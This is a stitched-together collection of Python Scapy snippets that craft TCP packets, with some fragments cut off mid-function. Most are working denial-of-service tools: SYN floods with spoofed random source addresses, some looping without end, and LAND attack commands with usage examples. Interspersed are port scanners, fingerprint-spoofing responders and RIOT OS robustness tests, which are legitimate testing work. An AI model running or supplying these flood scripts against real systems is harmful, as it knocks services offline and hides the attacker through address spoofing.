def run(self): # Damn, ugly! global forging if forging: i = IP() i.dst = ip if spoofing: i.src = '.'.join( random.randint(1, 254) for _ in range(4)) t = TCP() t.sport = random.randint(1, 65535) t.dport = port t.flags = 'S' try: send(i / t, verbose=0) except PermissionError: print('ohno, not forging') forging = False else: s = socket.socket() s.connect((self.ip, self.port))
def cmd_land(ip, count, port, iface, verbose): conf.verb = False if iface: conf.iface = iface layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
def service_craft(pkt, fp, mac, service, type_=False): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.ttl, 16) ip.flags = 0x4000 tcp = TCP() tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport if type_: tcp.flags = 0x018 # PSH / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].ack data = service[pkt[TCP].dport] fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data return fin_pkt else: tcp.flags = 0x012 # SYN / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].seq + 1 fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def test_send_ack_instead_of_syn(child, src_if, src_ll, dst_if, dst_l2, dst_ll, dst_port): # check if any debug output is generated during `@testfunc` decorator # execution. If so, send fewer packets to prevent the target node # from being overwhelmed by packets and output. debug = child.expect( [pexpect.TIMEOUT, r'GNRC_TCP: Enter "\S+", File: .+\(\d+\)\s'], timeout=1) if debug: count = 10 else: count = 1000 # see https://github.com/RIOT-OS/RIOT/pull/12001 provided_data = base64.b64decode("rwsQf2pekYLaU+exUBBwgPDKAAA=") tcp_hdr = TCP(provided_data) assert provided_data == raw(tcp_hdr) # set destination port to application specific port tcp_hdr.dport = dst_port sendp(Ether(dst=dst_l2) / IPv6(src=src_ll, dst=dst_ll) / tcp_hdr, iface=src_if, verbose=0, count=count) # check if server actually still works with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as sock: sock.settimeout(child.timeout) addr_info = socket.getaddrinfo(dst_ll + '%' + src_if, dst_port, type=socket.SOCK_STREAM) sock.connect(addr_info[0][-1]) child.expect_exact('gnrc_tcp_open_passive: returns 0') verify_pktbuf_empty(child)
def seqgen_pkt_craft(pkt, fp, mac, pno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['T1']['TTL'], 16) ip.flags = fp.probe['T1']['DF'] ip.id = fp.ip_id_gen() tcp = TCP() s_val = fp.probe['T1']['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = fp.tcp_seq_gen() a_val = fp.probe['T1']['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe['T1']['F'] tcp.flags = flag_val tcp.window = fp.probe['WIN']['W' + pno] tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport tcp.options = fp.probe['OPS']['O' + pno] rd_val = fp.probe['T1']['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def doSynFlood(origin_ip=None, origin_port=None, target_ip=None, target_port=None, interface=None, duration=None, gap=0): ''' Starts Syn Flood attacks Arguments: origin_ip (str): attacker ip origin_port (int): attacker port target_ip (str): target ip target_port (int): target port interface (str): network interface to use duration (int): duration of the attack gap (int): gap (delay) between packets Returns: None ''' # Check if everything is filled out if target_ip is None: return if target_port is None: return if duration is None: return if gap >= duration: return # Prepare the packet ip_layer = IP() ip_layer.src = origin_ip ip_layer.dst = target_ip tcp_layer = TCP() tcp_layer.sport = origin_port tcp_layer.dport = target_port tcp_layer.flags = "S" # Prepare timings time_start = time() time_end = time_start + duration # Start attack while (time() <= time_end): #duration # Constantly changing values tcp_layer.seq = GenerateRandomSafeSeq() tcp_layer.ack = GenerateRandomSafeSeq() tcp_layer.window = GenerateRandomWindow() attack_packet = ip_layer/tcp_layer # packet to send send(attack_packet, iface=interface) if gap > 0: sleep(gap) #gap
def configureTCPPacket(port): TCP_Packet = TCP() TCP_Packet.dport = port TCP_Packet.flags = "S" # SYN TCP_Packet.seq = getRand() TCP_Packet.sport = getRand() TCP_Packet.window = getRand() return TCP_Packet
def cmd_land(ip, count, port, iface, verbose): """This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port. The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND \b # sudo habu.land 172.16.0.10 ............ Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option. """ conf.verb = False if iface: iface = search_iface(iface) if iface: conf.iface = iface['name'] else: logging.error( 'Interface {} not found. Use habu.interfaces to show valid network interfaces' .format(iface)) return False layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = TCP() t.dport = self.port t.flags='S' print "Spoofing %s to send SYN ..." % i.src sr1(i/t,verbose=0)
def syn_flood(self, target, port): from scapy.all import IP, TCP, send i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65500) t.dport = port t.flags = 'S' send(i / t, verbose=0)
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = self.target t = TCP() t.dport = self.port t.flags = 'S' print "Spoofing %s to send SYN ..." % i.src sr1(i / t, verbose=0)
def run(self): i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = self.target t = TCP() t.sport = random.randint(1, 65535) t.dport = self.port t.flags = 'S' send(i / t, verbose=0)
def run(self): i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65535) t.dport = port t.flags = 'S' send(i/t, verbose=0)
def run(self): packet_ip = IP() packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) packet_ip.dst = self.host packet_tcp = TCP() packet_tcp.sport = random.randint(1024, 65535) packet_tcp.dport = self.port packet_tcp.flags = 'S' send(packet_ip/packet_tcp)
def ecn_craft(pkt, mac, fp): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['ECN']['TTL'], 16) ip_flag = fp.probe['ECN']['DF'] if ip_flag == 'Y': ip.flags = 2 else: ip.flags = 0 ip.id = fp.ip_id_gen() tcp = TCP() w_val = fp.probe['ECN']['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport cc_val = fp.probe['ECN']['CC'] if cc_val == 'Y': tcp.flags = 0x52 elif cc_val == 'N': tcp.flags = 0x12 elif cc_val == 'S': tcp.flags = 0xD2 else: tcp.flags = 0x10 o_val = fp.probe['ECN']['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def cmd_land(ip, count, port, iface, verbose): """This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port. The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND \b # sudo habu.land 172.16.0.10 ............ Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option. """ conf.verb = False if iface: conf.iface = iface layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
def is_port_open(ip_addr, port, timeout=5, verbose=False): ip = IP() ip.dst = ip_addr syn = TCP() syn.sport = choice(range(1000, 50000)) syn.dport = port syn.flags = 'S' syn.seq = 1 packet = ip/syn synack = sr1(packet, timeout=timeout, verbose=verbose) if synack and synack.sprintf('%TCP.flags%') == 'SA': return True return False
def sendSYN(host, port): # Create an IP Packet using random ip as source and the target IP as destination ipPacket = IP() ipPacket.src = ".".join( map(str, (random.randint(0, 255) for i in range(4)))) ipPacket.dst = host # Create a TCP segment using a random source port and the target port as the destination tcpSegment = TCP() tcpSegment.sport = random.randint(1000, 65535) tcpSegment.dport = port # Set the syn flag tcpSegment.flags = 'S' # Send the composition of the two (package/segment) and ignore the result send(ipPacket / tcpSegment, verbose=0) pass
def flood(target): IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose = False) except Exception as e: print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}") else: print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose): conf.verb = False if interface: conf.iface = interface layer2 = Ether() layer3 = IP() layer3.dst = ip layer4 = TCP() layer4.dport = port pkt = layer2 / layer3 / layer4 counter = 0 print("Please, remember to block your RST responses", file=sys.stderr) while True: if forgeip: pkt[IP].src = "%s.%s" % (pkt[IP].src.rsplit( '.', maxsplit=1)[0], randint(1, 254)) if forgemac: pkt[Ether].src = RandMAC() pkt[TCP].sport = randint(10000, 65000) if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() sendp(pkt) counter += 1 if count != 0 and counter == count: break return True
def test_gnrc_tcp_garbage_packets_ack_instead_of_sym(child): """ This test verfies that sending and ACK instead of a SYN. doesn't break GNRC_TCP. """ # Setup RIOT as server with RiotTcpServer(child, generate_port_number()) as riot_srv: # Construct HostTcpClient to lookup node properties host_cli = HostTcpClient(riot_srv) # Try to accept incoming connection from host system. # Use timeout of 15s discarding 1000 packages can take a while on smaller platforms child.sendline('gnrc_tcp_accept 15000') # Check if debug output is enabled. Send fewer packets on if it is disabled # To ensure that the amount of generated output doesn't break the test debug = child.expect( [pexpect.TIMEOUT, r'GNRC_TCP: Enter "\S+", File: .+\(\d+\)\s'], timeout=1) if debug: count = 10 else: count = 1000 # see https://github.com/RIOT-OS/RIOT/pull/12001 provided_data = base64.b64decode("rwsQf2pekYLaU+exUBBwgPDKAAA=") tcp_hdr = TCP(provided_data) assert provided_data == raw(tcp_hdr) # set destination port to application specific port tcp_hdr.dport = int(riot_srv.listen_port) sendp(Ether(dst=riot_srv.mac) / IPv6(src=host_cli.address, dst=riot_srv.address) / tcp_hdr, iface=host_cli.interface, verbose=0, count=count) # check if server actually still works with host_cli: child.expect_exact('gnrc_tcp_accept: returns 0') riot_srv.close()
def syn_flood(ip_destination, port_destination, limit): total = 0 print("Enviando Pacotes") for x in range(0, limit): ip_packet = IP() ip_packet.src = ".".join( map(str, (random.randint(0, 255) for _ in range(4)))) ip_packet.dst = ip_destination tcp_packet = TCP() tcp_packet.sport = random.randint(1000, 9000) tcp_packet.dport = port_destination tcp_packet.flags = "S" tcp_packet.seq = random.randint(1000, 9000) tcp_packet.window = random.randint(1000, 9000) print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport)) send(ip_packet / tcp_packet, verbose=0) total += 1 print("All packets sent")
def test_send_ack_instead_of_syn(child, src_if, src_ll, dst_if, dst_l2, dst_ll, dst_port): # see https://github.com/RIOT-OS/RIOT/pull/12001 provided_data = base64.b64decode("rwsQf2pekYLaU+exUBBwgPDKAAA=") tcp_hdr = TCP(provided_data) assert provided_data == raw(tcp_hdr) # set destination port to application specific port tcp_hdr.dport = dst_port sendp(Ether(dst=dst_l2) / IPv6(src=src_ll, dst=dst_ll) / tcp_hdr, iface=src_if, verbose=0, count=1000) # check if server actually still works with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as sock: sock.settimeout(child.timeout) addr_info = socket.getaddrinfo(dst_ll + '%' + src_if, dst_port, type=socket.SOCK_STREAM) sock.connect(addr_info[0][-1]) child.expect_exact('gnrc_tcp_open_passive: returns 0') verify_pktbuf_empty(child)
def syn_flood(): global FINISH while True: if FINISH: break IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target_ip TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target_port TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(e) else: print("[+] SYN packet sent!")
def flood(target): IP_Packet = IP() IP_Packet.src = random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(f"[{red} bold][✘] ERROR[/{red} bold] " + f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}") else: print(f"[{green}][✔] SUCCESS[/{green}] " + f"[{yellow}]SYN packet sent to[{yellow}] " + f"[{blue}]{'{}:{}'.format(*target)}")
def server_tcp(self, flags, payload=b"", count=True): data_length = max(len(payload), 1) tcp = TCP() tcp.flags = flags tcp.sport = self.service tcp.dport = self.client_port tcp.seq = self.ss tcp.ack = self.sa if count: self.ss += data_length self.ca += data_length packet = Ether(src=self.server.mac, dst=self.client.mac) packet /= IP(src=self.server.ip, dst=self.client.ip) packet /= tcp if len(payload) > 0: packet /= payload self.packets.append(packet)
def flood(target): IP_Packet = IP() IP_Packet.src = random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print( f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}" ) else: print( f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m" )
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose): """Launch a lot of TCP connections and keeps them opened. Some very old systems can suffer a Denial of Service with this. Reference: https://en.wikipedia.org/wiki/SYN_flood Example: \b # sudo habu.synflood 172.16.0.10 ................. Each dot is a packet sent. You can use the options '-2' and '-3' to forge the layer 2/3 addresses. If you use them, each connection will be sent from a random layer2 (MAC) and/or layer3 (IP) address. You can choose the number of connections to create with the option '-c'. The default is never stop creating connections. Note: If you send the packets from your real IP address and you want to keep the connections half-open, you need to setup for firewall to don't send the RST packets. """ conf.verb = False if interface: conf.iface = interface layer2 = Ether() layer3 = IP() layer3.dst = ip layer4 = TCP() layer4.dport = port pkt = layer2 / layer3 / layer4 counter = 0 print("Please, remember to block your RST responses", file=sys.stderr) while True: if forgeip: pkt[IP].src = "%s.%s" % (pkt[IP].src.rsplit( '.', maxsplit=1)[0], randint(1, 254)) if forgemac: pkt[Ether].src = RandMAC() pkt[TCP].sport = randint(10000, 65000) if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() sendp(pkt) counter += 1 if count != 0 and counter == count: break return True
#!/usr/bin/python from scapy.all import IP, TCP a = IP() a.src = "1.2.3.4" a.dst = "10.0.2.15" a.ihl = 5 b = TCP() b.sport = 1551 b.dport = 23 b.seq = 1551 b.flags = 'S' pkt = a/b with open("packet", "wb") as f: f.write(bytes(pkt))
print "Invalid syntax: ps.py [-u -t -i] <target IP> <p1[ p2 p3 ...]>" else: # TCP SYN if sys.argv[1] == "-t": print "TCP SYN scan on host " + sys.argv[2] + "\n" ip = IP() tcp = TCP() # cast as str and int to avoid issues caused by periods ip.dst = str(sys.argv[2]) # loop iterates through as many commandline arguments were given for port in range(len(sys.argv) - 3): print "Scanning port " + str(sys.argv[port + 3]) # port+3 is start of ports tcp.dport = int(sys.argv[port + 3]) # send SYN packet tcp.flags = "S" packet = (ip / tcp) # verbose=0 to limit console output; timeout 1s status = sr1(packet, verbose=0, timeout=1) if status: print str(packet.dport) + " is open\n" # UDP elif sys.argv[1] == "-u": print "UDP scan on host " + sys.argv[2] + "\n" ip = IP() udp = UDP() # cast as str and int to avoid issues caused by periods
4567, # filenail (commonly open port for backdoors) ] # try each common port until one responds for port in common_ports: # assemble IP packet with target IP ip = IP() ip.dst = target_ip # assemble TCP with dst port and SYN flag set tcp = TCP() tcp.dport = port tcp.flags = 'S' print('Trying port %d' % port) # send the packet and wait 2 seconds for an answer rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0) # if answered no need to try more ports if rcv_pkt: break # check to see if host responded, quit if otherwise
4567, # filenail (commonly open port for backdoors) ] # try each common port until one responds for port in common_ports: # assemble IP packet with target IP ip = IP() ip.dst = target_ip # assemble TCP with dst port and SYN flag set tcp = TCP() tcp.dport = port tcp.flags = 'S' print 'Trying port %d' % port # send the packet and wait 2 seconds for an answer rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0) # if answered no need to try more ports if rcv_pkt: break # check to see if host responded, quit if otherwise
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose): """Launch a lot of TCP connections and keeps them opened. Some very old systems can suffer a Denial of Service with this. Reference: https://en.wikipedia.org/wiki/SYN_flood Example: \b # sudo habu.synflood 172.16.0.10 ................. Each dot is a packet sent. You can use the options '-2' and '-3' to forge the layer 2/3 addresses. If you use them, each connection will be sent from a random layer2 (MAC) and/or layer3 (IP) address. You can choose the number of connections to create with the option '-c'. The default is never stop creating connections. Note: If you send the packets from your real IP address and you want to keep the connections half-open, you need to setup for firewall to don't send the RST packets. """ conf.verb = False if interface: conf.iface = interface layer2 = Ether() layer3 = IP() layer3.dst = ip layer4 = TCP() layer4.dport = port pkt = layer2 / layer3 / layer4 counter = 0 print("Please, remember to block your RST responses", file=sys.stderr) while True: if forgeip: pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254)) if forgemac: pkt[Ether].src = RandMAC() pkt[TCP].sport = randint(10000, 65000) if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() sendp(pkt) counter += 1 if count != 0 and counter == count: break return True
def t2tot7_craft(pkt, fp, mac, tno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe[tno]['TTL'], 16) ip.flags = fp.probe[tno]['DF'] ip.id = random.randint(1, 1000) tcp = TCP() s_val = fp.probe[tno]['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = pkt[TCP].ack + 369 a_val = fp.probe[tno]['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe[tno]['F'] tcp.flags = flag_val w_val = fp.probe[tno]['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport o_val = fp.probe[tno]['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val rd_val = fp.probe[tno]['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt